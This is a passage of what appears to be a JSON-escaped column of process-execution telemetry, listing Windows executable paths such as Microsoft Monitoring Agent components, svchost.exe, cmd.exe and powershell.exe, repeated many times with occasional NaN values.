files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\resources\\\\884\\\\pmfexe.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"NaN\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"NaN\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\appidcertstorecheck.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\usoclient.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\svchost.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\\cmd.exe\",\"c:\\\\windows\\\\system32\\\